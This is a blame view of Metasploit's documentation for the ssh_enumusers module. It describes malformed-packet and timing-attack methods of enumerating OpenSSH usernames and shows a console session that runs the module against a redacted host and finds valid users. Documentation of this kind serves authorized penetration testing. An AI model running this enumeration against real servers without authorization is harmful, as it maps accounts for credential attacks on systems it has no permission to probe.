adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/documentation/modules/auxiliary/scanner/ssh/ssh_enumusers.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

80 lines
2.3 KiB
Markdown
Raw Normal View History

Don't be lazy and spell out "introduction" in docs
2019-09-30 16:58:00 -05:00
## Introduction
Add module doc for ssh_enumusers
2018-08-20 19:26:30 -05:00
This module uses a malformed packet or timing attack to enumerate users on
an OpenSSH server.
Testing note: invalid users were logged, while valid users were not. YMMV.
## Actions
**Malformed Packet**
The default action sends a malformed (corrupted) `SSH_MSG_USERAUTH_REQUEST`
packet using public key authentication (must be enabled) to enumerate users.
**Timing Attack**
On some versions of OpenSSH under some configurations, OpenSSH will return a
"permission denied" error for an invalid user faster than for a valid user,
creating an opportunity for a timing attack to enumerate users.
## Options
**USERNAME**
Single username to test (username spray).
**USER_FILE**
File containing usernames, one per line.
**THRESHOLD**
Amount of seconds needed before a user is considered found (timing attack only).
**CHECK_FALSE**
Check for false positives (random username).
## Usage
```
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > set rhosts [redacted]
Add module doc for ssh_enumusers
2018-08-20 19:26:30 -05:00
rhosts => [redacted]
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf auxiliary(scanner/ssh/ssh_enumusers) > echo $'wvu\nbcook' > users
Add module doc for ssh_enumusers
2018-08-20 19:26:30 -05:00
[*] exec: echo $'wvu\nbcook' > users
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf auxiliary(scanner/ssh/ssh_enumusers) > set user_file users
Add module doc for ssh_enumusers
2018-08-20 19:26:30 -05:00
user_file => users
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf auxiliary(scanner/ssh/ssh_enumusers) > set verbose true
Add module doc for ssh_enumusers
2018-08-20 19:26:30 -05:00
verbose => true
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf auxiliary(scanner/ssh/ssh_enumusers) > run
Add module doc for ssh_enumusers
2018-08-20 19:26:30 -05:00
[*] [redacted]:22 - SSH - Using malformed packet technique
[*] [redacted]:22 - SSH - Starting scan
[+] [redacted]:22 - SSH - User 'wvu' found
[-] [redacted]:22 - SSH - User 'bcook' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf auxiliary(scanner/ssh/ssh_enumusers) > set action Timing Attack
Add module doc for ssh_enumusers
2018-08-20 19:26:30 -05:00
action => Timing Attack
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf auxiliary(scanner/ssh/ssh_enumusers) > run
Add module doc for ssh_enumusers
2018-08-20 19:26:30 -05:00
[*] [redacted]:22 - SSH - Using timing attack technique
[*] [redacted]:22 - SSH - Starting scan
[+] [redacted]:22 - SSH - User 'wvu' found
[-] [redacted]:22 - SSH - User 'bcook' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf auxiliary(scanner/ssh/ssh_enumusers) > creds
Add module doc for ssh_enumusers
2018-08-20 19:26:30 -05:00
Credentials
===========
host origin service public private realm private_type
---- ------ ------- ------ ------- ----- ------------
[redacted] [redacted] 22/tcp (ssh) wvu
Updates msf5 as well
2025-07-17 11:51:29 +01:00
msf auxiliary(scanner/ssh/ssh_enumusers) >
Add module doc for ssh_enumusers
2018-08-20 19:26:30 -05:00
```
Reference in New Issue Copy Permalink